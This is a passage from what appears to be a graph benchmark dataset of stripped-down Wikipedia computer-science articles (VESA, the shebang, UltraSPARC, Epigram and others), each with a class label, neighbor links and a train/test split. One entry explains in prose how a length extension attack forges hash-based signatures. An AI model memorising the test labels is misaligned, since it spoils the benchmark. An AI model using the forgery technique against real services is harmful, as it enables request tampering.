    "text": "VESA_Local_Bus:vesa local bus vesa local bus usually abbreviated vl-bus vlb short-lived expansion bus introduced i486 generation x86 ibm compatible personal computers created vesa video electronics standards association vesa local bus worked alongside dominant isa bus provide standardized high-speed conduit intended primarily accelerate video graphics operations vlb provided standardized fast path add-in video card makers could tap greatly accelerated memory-mapped i/o dma still using familiar isa bus handle basic device duties interrupts port-mapped i/o early 1990s i/o bandwidth prevailing isa bus become critical bottleneck pc video graphics performance need faster graphics driven increased adoption graphical user interfaces pc operating systems ibm produce viable successor isa micro channel architecture failed market due ibm requirement license payment licensing fees hardware manufacturers use extension royalty free isa bus form eisa open standard developed counter mca unable offer enough improvement isa meet dramatic increase bandwidth desired graphics thus short time market opening occurred video card manufacturers motherboard chipset makers created proprietary implementations local buses provide graphics cards direct access processor system memory avoided limitations isa bus less costly licensed ibm mca machine important note time migration mca architecture machine isa one insubstantial mca machines generally offer isa slots thus migration mca architecture meant prior investment isa cards made unusable additionally makers mca compatible cards subject ibm licensing fees combined mca greater technical requirements expense implement bad mca required peripheral cards passive members made cards active participants increasing system performance effect making mca version peripheral card significantly expensive isa counterpart ad-hoc manufacturer-specific solutions effective standardized provisions providing interoperability drew attention vesa consortium resulted proposal voluntary royalty free local bus standard 1992 additional benefit standardization beyond primary goal greater graphics card performance devices could also designed utilize performance offered vlb notably mass storage controllers offered vlb providing increased hard disk performance vlb slot simply additional edge connector placed in-line traditional isa eisa connector extended portion often colored distinctive brown result normal isa eisa slot additionally capable accepting vlb-compatible cards traditional isa cards remained compatible would pins past normal isa eisa portion slot reverse also true vlb cards necessity quite long order reach vlb connector reminiscent older full-length expansion cards earlier ibm xt era vlb portion slot looked similar ibm mca slot indeed physical 116-pin connector used mca cards rotated 180 degrees ibm mca standard popular ibm expected ample surplus connector making inexpensive readily available vesa local bus designed stopgap solution problem isa bus limited bandwidth one requirement vlb gain industry adoption minimal burden manufactures implement terms board re-design component costs otherwise manufacturers would convinced change proprietary solutions vlb fundamentally tied card directly 486 processor bus minimal intermediary logic reducing logic design component costs timing arbitration duties strongly dependent cards cpu simplicity vlb unfortunately created several factors served limit useful life substantially despite problems vesa local bus became commonplace later 486 motherboards majority later post-1992 486-based systems featuring vesa local bus video card vlb importantly offered less costly high speed interface consumer systems 1994 pci commonly available outside server market via pentium intel chipsets pci finally displaced vesa local bus also eisa last years 486 market last generation 80486 motherboards featuring pci slots lieu vlb capable isa slots however manufacturers develop offer vip v esa/ sa/ p ci motherboards three slot types",
    "neighbors": [
      4228,
      274,
      7442,
      8851,
      408,
      799,
      2723,
      6187,
      8625,
      10833,
      9686,
      8301,
      7151,
      11631,
      3445,
      6006,
      5368,
      2941,
      11007
    ],
    "mask": "Test"
  },
  {
    "node_id": 11628,
    "label": 9,
    "text": "Basic-256:basic-256 basic-256 project learn basics computer programming project started 2007 inspired article “ johnny ca n't code ” david brin main focus provide simple comprehensive environment middle/high school students learn basics computer programming basic-256 simple version basic code editor text output window graphics editor window visible screen however successive versions adding new features namely complete documentation available english russian dutch spanish portuguese",
    "neighbors": [
      219,
      5612,
      8262,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11629,
    "label": 3,
    "text": "Apple_A6X:apple a6x apple a6x 32-bit system-on-a-chip soc designed apple inc. introduced launch fourth generation ipad october 23 2012 high-performance variant apple a6 last 32-bit chip released switched 64-bit apple claims a6x twice cpu performance twice graphics performance predecessor apple a5x software updates ipad 4th generation ended 2017 thus ceasing support chip a6x features 1.4 ghz custom apple-designed armv7-a architecture based dual-core cpu called swift introduced apple a6 includes integrated quad-core powervr sgx554mp4 graphics processing unit gpu running 300 mhz quad-channel memory subsystem memory subsystem supports lpddr2-1066 dram increasing theoretical memory bandwidth 17 gb/s unlike a6 similar a5x a6x covered metal heat spreader includes ram package-on-package pop assembly a6x manufactured samsung high-κ metal gate hkmg 32 nm process die area 123 mm 30 larger a6",
    "neighbors": [
      9732,
      1549,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      9784,
      8250,
      8253,
      576,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      99,
      8806,
      3691,
      8812,
      6258,
      10357,
      6264,
      10361,
      4220,
      10365,
      2686,
      638,
      6783,
      7806,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      5784,
      7833,
      666,
      4251,
      5786,
      4258,
      7842,
      7844,
      4773,
      171,
      2735,
      3248,
      9913,
      4283,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      4810,
      3790,
      1744,
      4821,
      3286,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      4888,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      11066,
      6971,
      11257,
      9022,
      1346,
      8003,
      10562,
      6981,
      838,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      1377,
      9063,
      10602,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      392,
      3977,
      6539,
      398,
      1428,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      10675,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      9182,
      4068,
      5093,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 11630,
    "label": 3,
    "text": "Tesla_(microarchitecture):tesla microarchitecture named pioneering electrical engineer nikola tesla tesla codename gpu microarchitecture developed nvidia released 2006 successor prior microarchitectures nvidia first microarchitecture implement unified shaders used geforce 8 series geforce 9 series geforce 100 series geforce 200 series geforce 300 series gpus collectively manufactured 90 nm 80 nm 65 nm 55 nm 40 nm also geforce 405 quadro fx quadro x000 quadro nvs series nvidia tesla computing modules tesla replaced old fixed-pipeline microarchitectures represented time introduction geforce 7 series competed directly amd first unified shader microarchitecture named terascale development ati work xbox 360 used similar design tesla followed fermi tesla nvidia first microarchitecture implementing unified shader model driver supports direct3d 10 shader model 4.0 opengl 2.1 later drivers opengl 3.3 support architecture design major shift nvidia gpu functionality capability obvious change move separate functional units pixel shaders vertex shaders within previous gpus homogeneous collection universal floating point processors called stream processors perform universal set tasks geforce 8 unified shader architecture consists number stream processors sps unlike vector processing approach taken older shader units sp scalar thus operate one component time makes less complex build still quite flexible universal scalar shader units also advantage efficient number cases compared previous generation vector shader units rely ideal instruction mixture ordering reach peak throughput lower maximum throughput scalar processors compensated efficiency running high clock speed made possible simplicity geforce 8 runs various parts core differing clock speeds clock domains similar operation previous geforce 7 series gpus example stream processors geforce 8800 gtx operate 1.35 ghz clock rate rest chip operating 575 mhz geforce 8 performs significantly better texture filtering predecessors used various optimizations visual tricks speed rendering without impairing filtering quality geforce 8 line correctly renders angle-independent anisotropic filtering algorithm along full trilinear texture filtering g80 though smaller brethren equipped much texture filtering arithmetic ability geforce 7 series allows high-quality filtering much smaller performance hit previously nvidia also introduced new polygon edge anti-aliasing methods including ability gpu rops perform multisample anti-aliasing msaa hdr lighting time correcting various limitations previous generations geforce 8 perform msaa fp16 fp32 texture formats geforce 8 supports 128-bit hdr rendering increase prior cards 64-bit support chip new anti-aliasing technology called coverage sampling aa csaa uses z color coverage information determine final pixel color technique color optimization allows 16x csaa look crisp sharp claimed theoretical single-precision processing power tesla-based cards given flops may hard reach real-world workloads g80/g90/gt200 streaming multiprocessor sm contains 8 shader processors sp unified shader cuda core 2 special function units sfu sp fulfill two single-precision operations per clock 1 multiply 1 add using single mad instruction sfu fulfill four operations per clock four mul multiply instructions one sm whole execute 8 mads 16 operations 8 muls 8 operations per clock 24 operations per clock relatively speaking 3 times number sps therefore calculate theoretical dual-issue mad+mul performance floating point operations per second flops gflops graphics card sp count n shader frequency f ghz formula flops 3 × n × f however leveraging dual-issue performance like mad+mul problematic reasons order estimate performance real-world workloads may helpful ignore sfu assume 1 mad 2 operations per sp per cycle case formula calculate theoretical performance floating point operations per second becomes flops 2 × n × f theoretical double-precision processing power tesla gpu 1/8 single precision performance gt200 double precision support g8x g9x nvenc introduced later chips • 8800 gtx • 8800 ultra",
    "neighbors": [
      3585,
      3203,
      398,
      9489,
      2850,
      9126,
      7086,
      9774,
      9911,
      11322,
      8514,
      7111,
      2635,
      8523,
      344,
      10971,
      2525,
      2277,
      7911,
      8937,
      1776,
      6900,
      2937,
      508
    ],
    "mask": "Train"
  },
  {
    "node_id": 11631,
    "label": 3,
    "text": "Video_Electronics_Standards_Association:video electronics standards association vesa /ˈviːsə/ formally known video electronics standards association technical standards organization computer display standards organization incorporated california july 1989 office san jose california claims membership 225 companies november 1988 nec home electronics announced creation association develop promote super vga computer display standard successor ibm proprietary video graphics array vga display standard super vga enabled graphics display resolutions 800×600 pixels compared vga maximum resolution 640×480 pixels—a 36 increase organization since issued several additional standards related computer video display following major companies members vesa vesa criticized policy charging non-members published standards people believe practice charging specifications undermined purpose vesa organization according kendall bennett developer vbe/af standard vesa software standards committee closed due lack interest resulting charging high prices specifications time vesa standards available free although vesa hosts free standards documents free collection include newly developed standards even obsolete standards free collection incomplete 2010 current standards documents vesa cost hundreds thousands dollars older standards available free purchase 2017 free downloads require mandatory registration standards bodies provide specifications freely available download many including itu jedec ddwg hdmi hdmi 1.3a time displayport announced vesa criticized developing specification secret track record developing unsuccessful digital interface standards including plug display digital flat panel",
    "neighbors": [
      134,
      6150,
      5384,
      8977,
      2706,
      799,
      2594,
      8355,
      10658,
      424,
      6570,
      6575,
      8112,
      8625,
      9137,
      1717,
      10303,
      8266,
      10954,
      2941,
      4567,
      10971,
      3548,
      7647,
      4191,
      9056,
      9057,
      9321,
      11627,
      8301,
      11634,
      8439,
      1400,
      3323,
      3453
    ],
    "mask": "None"
  },
  {
    "node_id": 11632,
    "label": 2,
    "text": "Shebang_(Unix):shebang unix computing shebang character sequence consisting characters number sign exclamation mark beginning script also called sha-bang hashbang pound-bang hash-pling unix-like operating systems text file shebang used executable program loader mechanism parses rest file initial line interpreter directive loader executes specified interpreter program passing argument path initially used attempting run script program may use file input data example script named path path/to/script starts following line codice_1 program loader instructed run program /bin/sh passing path/to/script first argument linux behavior result kernel user-space code shebang line usually ignored interpreter character comment marker many scripting languages language interpreters use hash mark begin comments still may ignore shebang line recognition purpose form shebang interpreter directive follows interpreter absolute path executable program optional argument string representing single argument white space optional linux file specified interpreter executed execute right contains code kernel execute directly wrapper defined via sysctl executing microsoft .exe binaries using wine contains shebang linux minix interpreter also script chain shebangs wrappers yields directly executable file gets encountered scripts parameters reverse order example file /bin/a executable file elf format file /bin/b contains shebang /bin/a optparam file /bin/c contains shebang /bin/b executing file /bin/c resolves /bin/b /bin/c finally resolves /bin/a optparam /bin/b /bin/c darwin-based operating systems macos solaris file specified interpreter must executable binary script typical shebang lines shebang lines may include specific options passed interpreter however implementations vary parsing behavior options portability one option specified without embedded whitespace portability guidelines found interpreter directives allow scripts data files used commands hiding details implementation users programs removing need prefix scripts interpreter command line bourne shell script identified path some/path/to/foo initial line executed parameters bar baz provides similar result actually executed following command line instead /bin/sh specifies bourne shell end result shell commands file some/path/to/foo executed positional variables 1 2 values bar baz respectively also initial number sign character used introduce comments bourne shell language languages understood many interpreters whole shebang line ignored interpreter however interpreter ignore shebang line thus script consisting following two lines simply echos lines standard output run compared use global association lists file extensions interpreting applications interpreter directive method allows users use interpreters known global system level without administrator rights also allows specific selection interpreter without overloading filename extension namespace one file extension refers one file type allows implementation language script changed without changing invocation syntax programs invokers script need know implementation language script responsible specifying interpreter use shebangs must specify absolute paths paths relative current working directory system executables cause problems systems non-standard file system layout even systems fairly standard paths quite possible variants operating system different locations desired interpreter python example might /usr/bin/python /usr/local/bin/python even something like /home/username/bin/python installed ordinary user sometimes required edit shebang line copying script one computer another path coded script may apply new machine depending consistency past convention placement interpreter reason posix standardize path names posix standardize feature often program /usr/bin/env used circumvent limitation introducing level indirection. followed /usr/bin/env followed desired command without full path example mostly works path /usr/bin/env commonly used env utility invokes first sh found user path typically /bin/sh system setuid script support reintroduce race eliminated /dev/fd workaround described still portability issues openserver 5.0.6 unicos 9.0.2 /bin/env /usr/bin/env another portability problem interpretation command arguments systems including linux split arguments example running script first line like passed one argument /usr/bin/env rather two arguments cygwin also behaves way complex interpreter invocations possible use additional wrapper another problem scripts containing carriage return character immediately shebang perhaps result edited system uses dos line breaks microsoft windows systems interpret carriage return character part interpreter command resulting error message posix requires sh shell capable syntax similar bourne shell although require located /bin/sh example systems solaris posix-compatible shell /usr/xpg4/bin/sh many linux systems recent releases mac os x /bin/sh hard symbolic link /bin/bash bourne shell using syntax specific bash maintaining shebang pointing bourne shell portable shebang actually human-readable instance magic number executable file magic byte string two-character encoding ascii magic number detected exec family functions determine whether file script executable binary presence shebang result execution specified executable usually interpreter script language claimed old versions unix expect normal shebang followed space slash appears untrue rather blanks shebang traditionally allowed sometimes documented space see 1980 email history section shebang characters represented two bytes extended ascii encodings including utf-8 commonly used scripts text files current unix-like systems however utf-8 files may begin optional byte order mark bom exec function specifically detects bytes 0x23 0x21 presence bom shebang prevent script interpreter executed authorities recommend using byte order mark posix unix-like scripts reason wider interoperability philosophical concerns additionally byte order mark necessary utf-8 encoding endianness issues serves identify encoding utf-8 executable file starting interpreter directive simply called script often prefaced name general classification intended interpreter name shebang distinctive two characters may come inexact contraction sharp bang hash bang referring two typical unix names another theory sh shebang default shell sh usually invoked shebang usage current december 1989 probably earlier shebang introduced dennis ritchie edition 7 8 bell laboratories also added bsd releases berkeley computer science research present 2.8bsd activated default 4.2bsd bell laboratories edition 8 unix later editions released public first widely known appearance feature bsd lack interpreter directive support shell scripts apparent documentation version 7 unix 1979 describes instead facility bourne shell files execute permission would handled specially shell would sometimes depending initial characters script spawn subshell would interpret run commands contained file model scripts would behave commands called within bourne shell attempt directly execute file via operating system exec system trap would fail preventing scripts behaving uniformly normal system commands later versions unix-like systems inconsistency removed dennis ritchie introduced kernel support interpreter directives january 1980 version 8 unix following description kernel support interpreter directives spread versions unix one modern implementation seen linux kernel source fs/binfmt_script.c mechanism allows scripts used virtually context normal compiled programs including full system programs even interpreters scripts caveat though early versions kernel support limited length interpreter directive roughly 32 characters 16 first implementation would fail split interpreter name parameters directive quirks additionally modern systems allow entire mechanism constrained disabled security purposes example set-user-id support disabled scripts many systems note even systems full kernel support magic number scripts lacking interpreter directives although usually still requiring execute permission still runnable virtue legacy script handling bourne shell still present many modern descendants scripts interpreted user default shell",
    "neighbors": [
      515,
      9733,
      8966,
      9735,
      6797,
      10387,
      7444,
      4501,
      5397,
      10148,
      6313,
      9780,
      823,
      9407,
      8000,
      10304,
      5969,
      348,
      1632,
      9444,
      8554,
      9714
    ],
    "mask": "Test"
  },
  {
    "node_id": 11633,
    "label": 4,
    "text": "Super_Flexible:super flexible super flexible file synchronizer backup file synchronization software allows backing synchronizing files different drives different media cd dvd flash zip remote server",
    "neighbors": [
      9025,
      11201,
      7364,
      10341,
      3366,
      1801,
      3629,
      1358,
      6797,
      7983,
      11543,
      4574
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11634,
    "label": 3,
    "text": "VESA_BIOS_Extensions:vesa bios extensions vesa bios extensions vbe vesa standard currently version 3 defines interface used software access compliant video boards high resolutions bit depths opposed traditional int 10h bios calls limited resolutions 640×480 pixels 16 color 4-bit depth less vbe made available video card bios installs boot interrupt vectors point newer cards implement capable vbe 3.0 standard older versions vbe provide real mode interface used without significant performance penalty within protected mode operating systems consequently vbe standard almost never used writing video card drivers vendor thus invent proprietary protocol communicating video card despite common driver thunk real mode interrupt order initialize screen modes gain direct access card linear frame buffer tasks would otherwise require handling many hundreds proprietary variations exist card card standard provides primary functionality vesa bios extensions allows applications determine capabilities graphics card provides ability set display modes found vbe 2.0 adds new features prior vbe 1.2 standard including linear framebuffer access protected mode banking vbe core 2.0 features include superset vbe 2.0 standard standard adds refresh rate control facilities stereo glasses improved multi-buffering functions vbe 2.0 standard vbe/af provides low-level standard interface common acceleration functions available hardware functions defined standard access hardware cursors bit block transfers bit blt screen sprites hardware panning drawing functions supplemental specifications provides device independent interface application software super vga hardware function numbers assigned vesa software standards committee ssc dpms hardware standard allows graphics cards communicate dpms-compliant monitors via special signaling system used existing graphics controllers monitor cables signaling system allows graphics card tell monitor go number different power management power saving states effectively allow monitor turn use allows access special features flat panel controllers provides standard audio services currently version 1.00 vbe/ai specification defines three device classes wave midi volume device types covered provides standard entry vendor specific extensions display data channel ddc digital connection computer display graphics adapter allows display communicate specifications adapter standard created vesa provides hardware independent means operating system application read write data i²c serial control interface although mode number 16-bit value optional vbe mode numbers 14 bits wide bit 15 used vga bios flag clear preserve display memory vbe defined mode numbers follows starting vbe/core 2.0 vesa longer defines new vesa mode numbers longer requires device implement old numbers properly detect information screen mode use function 01h return vbe mode information mode 81ffh special video mode designed preserve current memory contents give access entire video memory beginning vbe 2.0 standard new modes defined vesa old modes longer mandatory use defined modes considered deprecated modern video cards may may use mode numbers even though backward compatibility modern software use correct way software discover available display modes obtain list modes using function 00h return vbe controller information check mode using function 01h return vbe mode information finds mode/s requires modes 264–268 text modes 264 0108h 80 columns × 60 rows 80×60 265 0109h 132×25 266 010ah 132×43 267 010bh 132×50 268 010ch 132×60 table combines modes defined vesa values denoted black along modes commonly used may work graphics cards defined standard linux kernel allows user select vesa mode boot time passing code memory kernel lilo boot loader passes code based vga parameter configuration file takes form 'vga=xxx xxx decimal value 'vga=0xhhh hhh hexadecimal value however 'vga= boot loader parameter directly accept vesa video mode numbers rather linux video mode number vesa number plus 512 case decimal representation plus 0x200 case hexadecimal representation example defined vesa value 257 0x101 representing 640x480 256 colours equivalent linux video mode value 769 0x301 see kernel documentation documentation/svga.txt documentation/fb/vesafb.txt indicated earlier vesa standard defines limited set modes particular none 1,280×1,024 covered instead implementation completely optional graphics adapter manufacturers vendors free utilize whatever additional values please means table modes expressed decimal form may apply graphics adapter vga= also appears select 1,280×800 8-bit various laptops displays br vga= 1,400×1,050 hwinfo hardware detection tool used suse linux gnu/linux distributions use hwinfo get actual mode number need pass parameter kernel command run root pick number corresponding desired resolution modes reported hwinfo hexadecimal use '0x prefix convert decimal vesa bios emulation parallels virtual machine different set non-standard vesa modes build 3214 vbetest reveals modes",
    "neighbors": [
      389,
      134,
      2706,
      7071,
      2594,
      9892,
      6570,
      823,
      11322,
      5312,
      5702,
      5457,
      4567,
      5080,
      1247,
      4071,
      1515,
      8301,
      11631,
      6129,
      11634,
      2811
    ],
    "mask": "None"
  },
  {
    "node_id": 11635,
    "label": 2,
    "text": "PTDOS:ptdos ptdos processor technology disk operating system operating system created late 1970s computers using intel 8080 microprocessor processor technology helios ii disk memory system following list commands supported ptdos 1.4",
    "neighbors": [
      2179,
      10499,
      10883,
      4614,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      8503,
      4409,
      9784,
      6075,
      7483,
      10809,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      5067,
      9932,
      5840,
      5457,
      11601,
      1750,
      7382,
      8410,
      477,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 11636,
    "label": 3,
    "text": "UltraSPARC:ultrasparc ultrasparc microprocessor developed sun microsystems fabricated texas instruments introduced mid-1995 first microprocessor sun implement 64-bit sparc v9 instruction set architecture isa marc tremblay co-microarchitect ultrasparc four-issue superscalar microprocessor executes instructions in-order nine-stage integer pipeline execution units simplified relative supersparc achieve higher clock frequencies example simplification alus cascaded unlike supersparc avoid restricting clock frequency integer register file 32 64-bit entries sparc isa uses register windows ultrasparc eight actual number registers 144 register file seven read three write ports integer register file provides registers two arithmetic logic units load/store unit two alus execute arithmetic logic shift instructions one execute multiply divide instructions floating-point unit consists five functional units one executes floating point adds subtracts one multiplies one divides square-roots two units executing simd instructions defined visual instruction set vis floating-point register file contains thirty-two 64-bit registers five read ports three write ports ultrasparc two levels cache primary secondary two primary caches one instructions one data capacity 16 kb ultrasparc required mandatory external secondary cache cache unified capacity 512 kb 4 mb direct-mapped return data single cycle external cache implemented synchronous srams clocked frequency microprocessor ratios supported accessed via data bus contained 3.8 million transistors fabricated texas instruments epic-3 process 0.5 µm complementary metal–oxide–semiconductor cmos process four levels metal ultrasparc fabricated bicmos process texas instruments claimed scale well 0.5 µm processes offered little performance improvement process perfected ti mvp digital signal processor dsp features missing three levels metal instead four 0.55 feature size used fabricate ultrasparc avoid repeat fabrication problems encountered supersparc ultrasparc packaged 521-contact plastic ball grid array pbga",
    "neighbors": [
      9090,
      9731,
      1801,
      1675,
      4235,
      6926,
      1809,
      4241,
      1818,
      2334,
      6815,
      8863,
      9637,
      1707,
      2731,
      10926,
      3247,
      9391,
      6322,
      2871,
      4664,
      4285,
      6464,
      7104,
      9665,
      8266,
      2895,
      3919,
      597,
      7039,
      10327,
      7770,
      2269,
      9955,
      7270,
      3175,
      11626,
      5358,
      1776,
      4465,
      630,
      631,
      9976,
      1788,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 11637,
    "label": 3,
    "text": "Rekursiv:rekursiv rekursiv computer processor designed david m. harland mid-1980s linn smart computing glasgow scotland one computer architectures intended implement object-oriented concepts directly hardware form high-level language computer architecture rekursiv operated directly objects rather bits nibbles bytes words virtual memory used persistent object store unusually processor instruction set supported recursion hence name project originated initiative within hi-fi manufacturer linn products improve manufacturing automation systems time ran dec vax minicomputer resulted design lingo object-oriented programming language derived smalltalk algol due poor performance lingo vax subsidiary company linn smart computing ltd. formed develop new processor efficiently run lingo rekursiv processor consisted four gate-array chips named numerik 32-bit alu logik instruction sequencer objekt object-oriented memory management unit klock processor clock support logic small number prototype vmebus boards called hades comprising four chips plus 80 mb ram produced intended installation host system sun-3 workstation although rekursiv never fully developed commercial success several hades boards used academic research projects uk last known copy rekursiv computer ended bottom forth clyde canal glasgow",
    "neighbors": [
      512,
      544,
      7104,
      2243,
      6187,
      9932,
      5358,
      11539,
      3350,
      5503
    ],
    "mask": "None"
  },
  {
    "node_id": 11638,
    "label": 6,
    "text": "Fossil_(file_system):fossil file system fossil default file system plan 9 bell labs serves network protocol 9p runs user space daemon like plan 9 file servers fossil different file systems due snapshot/archival feature take snapshots entire file system command automatically user-set interval snapshots kept fossil partition long disk space allows partition fills old snapshots removed free disk space snapshot also saved permanently venti fossil venti typically installed together important features include access snapshot one would connect running fossil instance “ mount ” change directory desired snapshot e.g /snapshot/yyyy/mmdd/hhmm yyyy mm dd hh mm meaning year month day hour minute access archive permanent snapshot directory form /archive/yyyy/mmdds yyyy mm dd meaning year month day sequence number would used plan 9 allows modifying namespace advanced ways like redirecting one path another path e.g /bin/ls /archive/2005/1012/bin/ls significantly eases working old versions files fossil available several platforms via plan 9 user space fossil designed implemented sean quinlan jim mckie russ cox bell labs added plan 9 distribution end 2002 became default file system 2003 replacing kfs previous plan 9 archival file system dubbed plan 9 file server fs fs also archival file system originally designed store data worm optical disc system permanent storage fossil provided venti typically stores data hard drives much lower access times optical discs",
    "neighbors": [
      5120,
      2051,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      10851,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      10016,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      1464,
      1978,
      6591,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11639,
    "label": 4,
    "text": "Length_extension_attack:length extension attack cryptography computer security length extension attack type attack attacker use hash message length message calculate hash message ‖ message attacker-controlled message without needing know content message algorithms like md5 sha-1 sha-2 based merkle–damgård construction susceptible kind attack sha-3 algorithm susceptible merkle–damgård based hash misused message authentication code construction h secret ‖ message message length secret known length extension attack allows anyone include extra information end message produce valid hash without knowing secret note since hmac n't use construction hmac hashes prone length extension attacks vulnerable hashing functions work taking input message using transform internal state input processed hash digest generated outputting internal state function possible reconstruct internal state hash digest used process new data way one may extend message compute hash valid signature new message server delivering waffles specified type specific user location could implemented handle requests given format server would perform request given deliver ten waffles type eggo given location user 1 signature valid user signature used mac signed key known attacker example also vulnerable replay attack sending request signature second time possible attacker modify request example switching requested waffle eggo liege done taking advantage flexibility message format duplicate content query string gives preference latter value flexibility indicate exploit message format message format never designed cryptographically secure first place without signature algorithm help order sign new message typically attacker would need know key message signed generate new signature generating new mac however length extension attack possible feed hash signature given state hashing function continue original request left long know length original request request original key length 14 bytes could determined trying forged requests various assumed lengths checking length results request server accepts valid message fed hashing function often padded many algorithms work input messages whose lengths multiple given size content padding always specified hash function used attacker must include padding bits forged message internal states message original line thus attacker constructs slightly different message using padding rules message includes padding appended original message inside hash function payload case 0x80 followed number 0x00s message length 0x228 552 14+55 *8 length key plus original message appended end attacker knows state behind hashed key/message pair original message identical new message final attacker also knows hash digest point means know internal state hashing function point trivial initialize hashing algorithm point input last characters generate new digest sign new message without original key combining new signature new data new request server see forged request valid request due signature would generated password known",
    "neighbors": [
      8674,
      7556,
      4389,
      6954,
      3984,
      9170,
      3477,
      2357,
      1941,
      8694,
      6905,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11640,
    "label": 7,
    "text": "BigMachines:bigmachines bigmachines software company founded 2000 godard abel christopher shutts headquartered deerfield illinois united states development offices san mateo california hyderabad india bigmachines also european operations offices frankfurt main germany london served bigmachines ag well offices singapore tokyo sydney serving asia-pacific company software designed integrate enterprise resource planning erp customer relationship management crm business systems vista equity partners private equity firm based san francisco acquired majority ownership bigmachines several transactions starting january 2001 vista equity acquired majority ownership company december 2010.shortly vista acquired majority ownership abel left company three years later oracle corporation announced acquiring bigmachines october 24 2013 transaction later completed oracle kept product called cpq cloud company partnered salesforce.com oracle crm on-demand vendavo pros provide software applications crm systems",
    "neighbors": [
      10090
    ],
    "mask": "None"
  },
  {
    "node_id": 11641,
    "label": 9,
    "text": "Epigram_(programming_language):epigram programming language epigram functional programming language dependent types epigram also refers ide usually packaged language epigram type system strong enough express program specifications goal support smooth transition ordinary programming integrated programs proofs whose correctness checked certified compiler epigram exploits propositions types principle based intuitionistic type theory epigram prototype implemented conor mcbride based joint work james mckinna development continued epigram group nottingham durham st andrews royal holloway uk current experimental implementation epigram system freely available together user manual tutorial background material system used linux windows mac os x currently unmaintained version 2 intended implement observational type theory never officially released however exists github mirror last updated 2012 design epigram epigram 2 inspired development systems agda idris coq epigram uses two-dimensional natural deduction style syntax latex version ascii version examples epigram tutorial following declaration defines natural numbers declaration says codice_1 type kind codice_2 i.e. simple type two constructors codice_3 codice_4 constructor codice_4 takes single codice_1 argument returns codice_1 equivalent haskell declaration codice_8 latex code displayed formula_1 horizontal-line notation read assuming top true infer bottom true example assuming codice_9 type codice_1 codice_11 type codice_1 nothing top bottom statement always true codice_3 type codice_1 cases formula_2 formula_3 formula_4 ... ascii ... ascii epigram essentially typed lambda calculus generalized algebraic data type extensions except two extensions first types first-class entities type formula_5 types arbitrary expressions type formula_5 type equivalence defined terms types normal forms second dependent function type instead formula_7 formula_8 formula_9 bound formula_10 value function argument type formula_11 eventually takes full dependent types implemented epigram powerful abstraction unlike dependent ml value depended upon may valid type sample new formal specification capabilities dependent types bring may found epigram tutorial",
    "neighbors": [
      1952,
      9345,
      3876,
      5796,
      10953,
      12,
      5612,
      6797,
      7983,
      11221,
      3926,
      823,
      1019,
      8924,
      5885,
      6239
    ],
    "mask": "None"
  },
  {
    "node_id": 11642,
    "label": 4,
